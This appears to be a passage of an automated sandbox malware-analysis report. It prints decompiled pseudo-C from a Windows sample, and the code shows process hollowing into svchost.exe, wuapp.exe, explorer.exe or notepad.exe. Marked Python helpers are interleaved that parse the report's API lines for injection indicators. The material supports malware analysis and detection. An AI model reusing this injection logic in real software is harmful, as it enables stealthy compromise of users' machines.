                                                                                                        • Opcode Fuzzy Hash: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
                                                                                                        • Instruction Fuzzy Hash: 97512071D4030565FB209A519D47FAB727D5B00788F14007BB905B11C2FBBDBE54866E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 81%
                                                                                                        			E00405E60(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _v24;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _v36;
                                                                                                        				void* _v40;
                                                                                                        				char _v44;
                                                                                                        				char _v48;
                                                                                                        				signed int _v56;
                                                                                                        				char _v60;
                                                                                                        				char _v132;
                                                                                                        				intOrPtr _v1232;
                                                                                                        				intOrPtr _v1236;
                                                                                                        				intOrPtr _v1240;
                                                                                                        				intOrPtr _v1244;
                                                                                                        				intOrPtr _v1324;
                                                                                                        				char _v1372;
                                                                                                        				signed int _t99;
                                                                                                        				int _t107;
                                                                                                        				void* _t109;
                                                                                                        				void* _t116;
                                                                                                        				intOrPtr _t117;
                                                                                                        				signed int _t118;
                                                                                                        				signed int _t122;
                                                                                                        				void* _t132;
                                                                                                        				void* _t145;
                                                                                                        				void* _t151;
                                                                                                        				void* _t153;
                                                                                                        				void* _t154;
                                                                                                        				signed int _t159;
                                                                                                        				void* _t173;
                                                                                                        				intOrPtr _t174;
                                                                                                        				signed int _t175;
                                                                                                        				signed int _t176;
                                                                                                        				intOrPtr* _t181;
                                                                                                        				signed int _t182;
                                                                                                        				intOrPtr* _t185;
                                                                                                        				signed int _t188;
                                                                                                        				intOrPtr* _t192;
                                                                                                        				void* _t199;
                                                                                                        				void* _t204;
                                                                                                        				void* _t205;
                                                                                                        				void* _t208;
                                                                                                        				void* _t209;
                                                                                                        				void* _t210;
                                                                                                        				void* _t223;
                                                                                                        				signed int _t225;
                                                                                                        
                                                                                                        				_t175 = __edx;
                                                                                                        				_t154 = __ecx;
                                                                                                        				_t153 = _t199;
                                                                                                        				_v8 =  *((intOrPtr*)(_t153 + 4));
                                                                                                        				E00401BB0( &_v1372, 0, 0x4d0);
                                                                                                        				_t185 =  *((intOrPtr*)(_t153 + 8));
                                                                                                        				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
                                                                                                        				_v1324 = 0x100002;
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movlpd [ebp-0x30], xmm0");
                                                                                                        				_t215 =  *_t185 - 0x5a4d;
                                                                                                        				if( *_t185 != 0x5a4d) {
                                                                                                        					E00401CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
                                                                                                        					_t204 = _t204 + 0x10;
                                                                                                        				}
                                                                                                        				_t99 = E00401E50(_t154, _t175, _t215, "ntdll.dll");
                                                                                                        				_v20 = _t99;
                                                                                                        				_t205 = _t204 + 4;
                                                                                                        				_v16 = _t175;
                                                                                                        				_t156 = _t99 | _t175;
                                                                                                        				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
                                                                                                        					L34:
                                                                                                        					__eflags = 0;
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
                                                                                                        					if( *_t181 != 0x4550) {
                                                                                                        						goto L34;
                                                                                                        					} else {
                                                                                                        						E00401670( &_v132, 0, 0x44);
                                                                                                        						E00401670( &_v40, 0, 0x10);
                                                                                                        						_t208 = _t205 + 0x18;
                                                                                                        						_v132 = 0x44;
                                                                                                        						_push( &_v40);
                                                                                                        						_push( &_v132);
                                                                                                        						_push(0);
                                                                                                        						_push(0);
                                                                                                        						if( *0x5d1bb8 == 0) {
                                                                                                        							_push(4);
                                                                                                        						} else {
                                                                                                        							_push(0x800000c);
                                                                                                        						}
                                                                                                        						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??); // executed
                                                                                                        						_t220 = _t107;
                                                                                                        						if(_t107 == 0) {
                                                                                                        							goto L34;
                                                                                                        						} else {
                                                                                                        							_t109 = E004061F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372); // executed
                                                                                                        							_t209 = _t208 + 0x10;
                                                                                                        							_t221 = _t109;
                                                                                                        							if(_t109 == 0) {
                                                                                                        								L33:
                                                                                                        								TerminateProcess(_v40, 0);
                                                                                                        								CloseHandle(_v36);
                                                                                                        								CloseHandle(_v40);
                                                                                                        								goto L34;
                                                                                                        							} else {
                                                                                                        								asm("adc eax, 0x0");
                                                                                                        								_t116 = E00406250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24); // executed
                                                                                                        								_t210 = _t209 + 0x20;
                                                                                                        								if(_t116 == 0) {
                                                                                                        									goto L33;
                                                                                                        								} else {
                                                                                                        									_t159 =  *((intOrPtr*)(_t181 + 0x34));
                                                                                                        									_t176 = _v56;
                                                                                                        									_t117 =  *((intOrPtr*)(_t181 + 0x30));
                                                                                                        									_v20 = _t159;
                                                                                                        									_t223 = _t176 - _t159;
                                                                                                        									if(_t223 < 0) {
                                                                                                        										L18:
                                                                                                        										_t118 = E004072C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
                                                                                                        										_v20 = _t118;
                                                                                                        										_v16 = _t176;
                                                                                                        										if((_t118 | _t176) == 0 || E004074D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
                                                                                                        											goto L33;
                                                                                                        										} else {
                                                                                                        											_t188 = _v20;
                                                                                                        											if(E004073C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
                                                                                                        												goto L33;
                                                                                                        											} else {
                                                                                                        												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
                                                                                                        												_v24 = 0;
                                                                                                        												if(0 >=  *(_t181 + 6)) {
                                                                                                        													L27:
                                                                                                        													asm("adc eax, 0x0");
                                                                                                        													if(E004074D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
                                                                                                        														goto L33;
                                                                                                        													} else {
                                                                                                        														_t182 = _v16;
                                                                                                        														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
                                                                                                        														asm("adc ecx, edi");
                                                                                                        														_v1240 = 0;
                                                                                                        														if(E00407230(0, _t176, _v36,  &_v1372) == 0 || E004071A0(0, _t176, _v36) == 0) {
                                                                                                        															goto L33;
                                                                                                        														} else {
                                                                                                        															Sleep(0x1388); // executed
                                                                                                        															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4); // executed
                                                                                                        															_v24 = _t132;
                                                                                                        															if(_t132 != 0) {
                                                                                                        																E00401BB0(_t132, 0, 0x138);
                                                                                                        																E004074D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
                                                                                                        																VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                        															}
                                                                                                        															FindCloseChangeNotification(_v36); // executed
                                                                                                        															CloseHandle(_v40);
                                                                                                        															return _v32;
                                                                                                        														}
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													_t192 = _t181 + 0x2c + _t122;
                                                                                                        													while(1) {
                                                                                                        														asm("adc eax, [ebp-0x4]");
                                                                                                        														if(E004074D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
                                                                                                        															goto L33;
                                                                                                        														}
                                                                                                        														_t145 = E00406300( *((intOrPtr*)(_t192 + 0x10)));
                                                                                                        														_t210 = _t210 + 4;
                                                                                                        														asm("adc eax, [ebp-0x4]");
                                                                                                        														if(E004073C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
                                                                                                        															goto L33;
                                                                                                        														} else {
                                                                                                        															_t192 = _t192 + 0x28;
                                                                                                        															_t173 = _v24 + 1;
                                                                                                        															_v24 = _t173;
                                                                                                        															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
                                                                                                        																continue;
                                                                                                        															} else {
                                                                                                        																_t188 = _v20;
                                                                                                        																goto L27;
                                                                                                        															}
                                                                                                        														}
                                                                                                        														goto L35;
                                                                                                        													}
                                                                                                        													goto L33;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										_t174 = _v60;
                                                                                                        										if(_t223 > 0 || _t174 >= _t117) {
                                                                                                        											_v16 =  *((intOrPtr*)(_t181 + 0x50));
                                                                                                        											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
                                                                                                        											_t185 =  *((intOrPtr*)(_t153 + 8));
                                                                                                        											asm("adc eax, [ebp-0x8]");
                                                                                                        											_t225 = _t176;
                                                                                                        											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
                                                                                                        												goto L18;
                                                                                                        											} else {
                                                                                                        												_t151 = E00407120(_t176, _v40, _t174, _t176);
                                                                                                        												_t227 = _t151;
                                                                                                        												if(_t151 != 0) {
                                                                                                        													goto L33;
                                                                                                        												} else {
                                                                                                        													goto L18;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										} else {
                                                                                                        											goto L18;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L35:
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,00000044,?), ref: 00405F4A
                                                                                                        • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 00406150
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 00406164
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 004061A1
                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B0
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B5
                                                                                                          • Part of subcall function 004074D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 004074FF
                                                                                                          • Part of subcall function 004073C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 00407429
                                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061C8
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061D7
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseProcess$Handle$CurrentVirtual$AllocChangeCreateFindFreeNotificationSleepTerminate
                                                                                                        • String ID: 0125789244697858$ntdll.dll$I@
                                                                                                        • API String ID: 3897173628-1460664302
                                                                                                        • Opcode ID: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
                                                                                                        • Instruction ID: 1d2188587597bc53f96400c66c54050a6bc471ffeb9cfe25592a30c854cca956
                                                                                                        • Opcode Fuzzy Hash: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
                                                                                                        • Instruction Fuzzy Hash: E9B18071D00209BBEF109B95CD41FAEBBB9FF04304F14406AFA05B62D1E779A960DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
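The API list above for the function at 0x00405E60 shows a CreateProcessW call whose dwCreationFlags argument is 0x0800000C, i.e. CREATE_SUSPENDED | DETACHED_PROCESS | CREATE_NO_WINDOW, followed by a 5000 ms Sleep (0x1388), a VirtualAlloc of 0x138 bytes with PAGE_READWRITE (0x04), VirtualFree and TerminateProcess. The following parser for the report's own "APIs" line format decodes those flags and applies a few injection heuristics to one function's calls. It is an added example, not part of the Joe Sandbox report or of the sample's code; the sample lines embedded in it are copied from this function's API list, the flag table is the documented Win32 dwCreationFlags constants, and the heuristics (suspended child creation, RWX allocation, create-and-terminate in one function) are this example's own, not the report's detection logic:

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the API lines of the function at 0x00405E60 exactly as the
# report prints them (a "?" is an argument the sandbox could not recover).
SAMPLE_API_LINES = """\
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,00000044,?), ref: 00405F4A
• Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 00406150
• VirtualAlloc.KERNELBASE(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 00406164
• VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 004061A1
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B5
  • Part of subcall function 004074D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 004074FF
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061C8
"""

# One report line: optional "Part of subcall function ADDR:" prefix, API.Module(args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 dwCreationFlags bits (documented CreateProcess constants).
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x00080000: "EXTENDED_STARTUPINFO_PRESENT",
    0x01000000: "CREATE_BREAKAWAY_FROM_JOB",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}
PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw tokens as printed; "?" = unrecovered
    ref: int                 # address of the call site
    parent: Optional[int]    # subcall function address, None for a top-level call


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the report's 'APIs' block into structured records; unknown lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        calls.append(ApiCall(
            api=m["api"], module=m["module"],
            args=[a.strip() for a in m["args"].split(",")],
            ref=int(m["ref"], 16),
            parent=int(m["parent"], 16) if m["parent"] else None,
        ))
    return calls


def arg_int(call: ApiCall, index: int) -> Optional[int]:
    """Argument `index` as an int, or None when it is '?', a string like 'I@', or absent."""
    if index >= len(call.args):
        return None
    try:
        return int(call.args[index], 16)
    except ValueError:
        return None


def decode_flags(value: int, table: dict) -> List[str]:
    """Names of the set bits, lowest first; unnamed bits are reported as one hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)   # sum of the keys = mask of all named bits
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names


def injection_indicators(calls: List[ApiCall]) -> List[str]:
    """Heuristics over one function's top-level calls (subcalls excluded). Each hit is a string."""
    hits = []
    top = [c for c in calls if c.parent is None]
    for c in top:
        if c.api == "CreateProcessW":
            flags = arg_int(c, 5)            # dwCreationFlags is the 6th parameter
            if flags is not None and flags & 0x4:
                hits.append(f"CreateProcessW with {'|'.join(decode_flags(flags, CREATION_FLAGS))} at {c.ref:08X}")
        if c.api == "VirtualAlloc":
            if arg_int(c, 3) == PAGE_EXECUTE_READWRITE:   # flProtect is the 4th parameter
                hits.append(f"VirtualAlloc PAGE_EXECUTE_READWRITE at {c.ref:08X}")
    if {"CreateProcessW", "TerminateProcess"} <= {c.api for c in top}:
        hits.append("creates and terminates a process in the same function")
    return hits


if __name__ == "__main__":
    for hit in injection_indicators(parse_api_lines(SAMPLE_API_LINES)):
        print(hit)
```

Only top-level calls feed the heuristics: the `00003000,00000040` residue in the GetCurrentProcess subcall line is stack noise the sandbox printed, not a verified VirtualAlloc argument, so the example deliberately does not treat it as an RWX allocation.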

                                                                                                        C-Code - Quality: 36%
			E00407FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				// Arguments, inferred from the signatures of the two shell APIs called below:
				//   _a4  : caller's output buffer (LPWSTR), filled by E00401A00 or by SHGetFolderPathW
				//   _a8  : REFKNOWNFOLDERID for SHGetKnownFolderPath (available on Vista and later)
				//   _a12 : CSIDL value for the SHGetFolderPathW fallback (older Windows)
				// Both APIs are resolved at run time with LoadLibraryA/GetProcAddress, so neither
				// name appears in the static import table of the sample.
				char _v8;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t22;

				_t22 = LoadLibraryA("Shell32.dll");
				if(_t22 == 0) {
					L8:
					return 0;
				} else {
					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
					if(_t11 == 0) {
						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
						if(_t12 == 0) {
							goto L7;
						} else {
							// stdcall arguments are pushed right to left, so this sequence is
							// SHGetFolderPathW(hwnd=0, csidl=_a12, hToken=0, dwFlags=0, pszPath=_a4);
							// S_OK (0) is treated as success.
							_push(_a4);
							_push(0);
							_push(0);
							_push(_a12);
							_push(0);
							if( *_t12() == 0) {
								goto L4;
							} else {
								goto L7;
							}
						}
					} else {
						_v8 = 0;
						// SHGetKnownFolderPath(rfid=_a8, dwFlags=0, hToken=0, ppszPath=&_v8)
						_t17 =  *_t11(_a8, 0, 0,  &_v8); // executed
						if(_t17 != 0) {
							L7:
							FreeLibrary(_t22);
							goto L8;
						} else {
							// Copy the returned path into the caller's buffer, then release the
							// shell-allocated string as the API requires (CoTaskMemFree).
							E00401A00(_a4, _v8);
							__imp__CoTaskMemFree(_v8);
							L4:
							FreeLibrary(_t22);
							return 1;
						}
					}
				}
			}
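Reading the SHGetFolderPathW branch of E00407FA0 requires undoing the decompiler's `_push` sequence: on 32-bit stdcall the arguments are pushed right to left, so the last push is the first parameter. The helper below binds a push sequence (or the argument list of a direct call such as `*_t11(_a8, 0, 0, &_v8)`) to named parameters from a prototype table, and reproduces the two calls in this function. It is an added example, not code from the report or from the sample; the prototypes are the documented ones for SHGetKnownFolderPath and SHGetFolderPathW, and the argument tokens (`_a4`, `_a8`, `_a12`, `&_v8`) are the decompiler's names as printed above:

```python
from typing import Dict, List

# Documented parameter order of the two shell APIs the function resolves at run time.
PROTOTYPES: Dict[str, List[str]] = {
    "SHGetKnownFolderPath": ["rfid", "dwFlags", "hToken", "ppszPath"],
    "SHGetFolderPathW": ["hwnd", "csidl", "hToken", "dwFlags", "pszPath"],
}


def bind_arguments(api: str, tokens: List[str], order: str) -> Dict[str, str]:
    """Map argument tokens onto parameter names.

    order="push": tokens are the decompiler's _push() sequence in program order;
                  x86 stdcall/cdecl push right to left, so the LAST push is the FIRST parameter.
    order="call": tokens are already in call order, as in a direct `*fn(a, b, c)` expression.
    Every parameter here is one 32-bit slot; a 64-bit argument would occupy two pushes and
    would need widening before this mapping is applied.
    """
    params = PROTOTYPES[api]
    if len(tokens) != len(params):
        raise ValueError(f"{api} takes {len(params)} arguments, got {len(tokens)} tokens")
    if order == "push":
        tokens = list(reversed(tokens))
    elif order != "call":
        raise ValueError("order must be 'push' or 'call'")
    return dict(zip(params, tokens))


def render_call(api: str, tokens: List[str], order: str) -> str:
    """Render the bound call as `Api(param=value, ...)` for a reader's annotation."""
    bound = bind_arguments(api, tokens, order)
    return f"{api}(" + ", ".join(f"{k}={v}" for k, v in bound.items()) + ")"


# The two calls exactly as the listing of E00407FA0 shows them.
FALLBACK_PUSHES = ["_a4", "0", "0", "_a12", "0"]          # _push() sequence, program order
PRIMARY_CALL = ["_a8", "0", "0", "&_v8"]                    # *_t11(_a8, 0, 0, &_v8)

if __name__ == "__main__":
    print(render_call("SHGetFolderPathW", FALLBACK_PUSHES, "push"))
    print(render_call("SHGetKnownFolderPath", PRIMARY_CALL, "call"))
```

The two rendered calls agree on the roles of the arguments: `_a4` is the output buffer in both paths, `_a8` is the KNOWNFOLDERID reference and `_a12` the CSIDL used only when SHGetKnownFolderPath is unavailable.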


                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
                                                                                                        • CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040800C
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00408029
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressProc$LoadTask
                                                                                                        • String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
                                                                                                        • API String ID: 2437428030-337183102
                                                                                                        • Opcode ID: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
                                                                                                        • Instruction ID: 5a5f59212e9234ed04b8ab6130e8ec1b5f2c4e940e4abc4082f6536912f10ee2
                                                                                                        • Opcode Fuzzy Hash: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
                                                                                                        • Instruction Fuzzy Hash: 6901F531640205BBDB215F60DE0AB9E3BA8EF08741F104035FD04B41E1EFB9DE249A9D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00403150(intOrPtr _a4) {
                                                                                                        				short _v524;
                                                                                                        				int _t6;
                                                                                                        				void* _t11;
                                                                                                        				void* _t16;
                                                                                                        				char* _t17;
                                                                                                        				char* _t18;
                                                                                                        
                                                                                                        				if( *0x5d1314 == 0) {
                                                                                                        					if( *0x5d1318 == 0) {
                                                                                                        						_t17 = L"\\System32\\wuapp.exe";
                                                                                                        						_t18 = L"\\System32\\svchost.exe";
                                                                                                        					} else {
                                                                                                        						goto L4;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					if( *0x5d1318 != 0) {
                                                                                                        						L4:
                                                                                                        						_t17 = L"\\SysWOW64\\wuapp.exe";
                                                                                                        						_t18 = L"\\SysWOW64\\svchost.exe";
                                                                                                        					} else {
                                                                                                        						_t17 = L"\\notepad.exe";
                                                                                                        						_t18 = L"\\explorer.exe";
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
                                                                                                        				if(_t6 == 0 || _t6 > 0x104) {
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t20 = _a4;
                                                                                                        					E00401A00(_a4,  &_v524);
                                                                                                        					E00401970(_a4, _t17);
                                                                                                        					_t11 = E00407ED0(_t20); // executed
                                                                                                        					if(_t11 != 0) {
                                                                                                        						L11:
                                                                                                        						return 1;
                                                                                                        					} else {
                                                                                                        						E00401A00(_t20,  &_v524);
                                                                                                        						E00401970(_t20, _t18);
                                                                                                        						_t16 = E00407ED0(_t20);
                                                                                                        						if(_t16 != 0) {
                                                                                                        							goto L11;
                                                                                                        						} else {
                                                                                                        							return _t16;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,75144D40,00000000), ref: 004031A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryWindows
                                                                                                        • String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
                                                                                                        • API String ID: 3619848164-3654143111
                                                                                                        • Opcode ID: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
                                                                                                        • Instruction ID: 5271e3ad36bb831133aa074bfbbea18cf9a940d0c74e058bf0f41e493ec8db13
                                                                                                        • Opcode Fuzzy Hash: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
                                                                                                        • Instruction Fuzzy Hash: 8B112B71A0220467D7206A15AC45BAB775CCB0535AF1405BBFD08F62E3D73E9F8582DE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 93%
                                                                                                        			E00404DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
                                                                                                        				char _v1784;
                                                                                                        				intOrPtr _v1788;
                                                                                                        				char _v1792;
                                                                                                        				intOrPtr _v1796;
                                                                                                        				char _v2052;
                                                                                                        				intOrPtr _v2056;
                                                                                                        				char _v2568;
                                                                                                        				char _v3080;
                                                                                                        				intOrPtr _v3084;
                                                                                                        				char _v3148;
                                                                                                        				char _v3276;
                                                                                                        				intOrPtr _t41;
                                                                                                        				intOrPtr _t42;
                                                                                                        				intOrPtr _t43;
                                                                                                        				void* _t44;
                                                                                                        				void* _t46;
                                                                                                        				char _t52;
                                                                                                        				char _t62;
                                                                                                        				void* _t76;
                                                                                                        				short _t79;
                                                                                                        				void* _t84;
                                                                                                        				intOrPtr _t85;
                                                                                                        				void* _t86;
                                                                                                        				void* _t87;
                                                                                                        				void* _t88;
                                                                                                        				void* _t89;
                                                                                                        				void* _t92;
                                                                                                        				void* _t93;
                                                                                                        
                                                                                                        				_t93 = __eflags;
                                                                                                        				_t80 = __edx;
                                                                                                        				_t79 = __ecx;
                                                                                                        				E00401670( &_v3276, 0, 0xcc8);
                                                                                                        				_t41 =  *0x5d1bb4; // 0x1e
                                                                                                        				_t81 = _a4;
                                                                                                        				_v2056 = _t41;
                                                                                                        				_t42 =  *0x5d1bbc; // 0xa
                                                                                                        				_v1796 = _t42;
                                                                                                        				_t43 =  *0x5d1c24; // 0x0
                                                                                                        				_v1788 = _t43;
                                                                                                        				_t44 = E00404B00(_t79, __edx, _t93, _a4); // executed
                                                                                                        				_t84 = _t44;
                                                                                                        				_t87 = _t86 + 0x10;
                                                                                                        				_t94 = _t84;
                                                                                                        				if(_t84 != 0) {
                                                                                                        					L5:
                                                                                                        					_t46 = E004028F0(_t84, E00405000,  &_v3276);
                                                                                                        					_t88 = _t87 + 0xc;
                                                                                                        					_push(_t84);
                                                                                                        					if(_t46 >= 0) {
                                                                                                        						E00401510();
                                                                                                        						_t85 = _a12;
                                                                                                        						_t89 = _t88 + 4;
                                                                                                        						__eflags = _v2052;
                                                                                                        						if(_v2052 != 0) {
                                                                                                        							E004017E0(_t85 + 0x4c8,  &_v2052);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        						}
                                                                                                        						__eflags = _v3276;
                                                                                                        						if(_v3276 != 0) {
                                                                                                        							E004017E0(_t85,  &_v3276);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        						}
                                                                                                        						__eflags = _v3148;
                                                                                                        						if(_v3148 != 0) {
                                                                                                        							E004017E0(_t85 + 0x80,  &_v3148);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        						}
                                                                                                        						__eflags = _v3080;
                                                                                                        						if(_v3080 != 0) {
                                                                                                        							_t82 = _t85 + 0xc4;
                                                                                                        							E004017E0(_t85 + 0xc4,  &_v3080);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        							__eflags = _v1784;
                                                                                                        							if(_v1784 != 0) {
                                                                                                        								__eflags =  *0x5d1c28;
                                                                                                        								if( *0x5d1c28 != 0) {
                                                                                                        									_t62 = E00401740("d572da9202196121d952231f26d65d07",  &_v1784);
                                                                                                        									_t89 = _t89 + 8;
                                                                                                        									__eflags = _t62;
                                                                                                        									if(_t62 != 0) {
                                                                                                        										_t23 =  &_a20; // 0x404a7a
                                                                                                        										E004076A0(_t79, _t80, _t82, _a16,  *_t23,  &_v1784);
                                                                                                        										_t89 = _t89 + 0x10;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
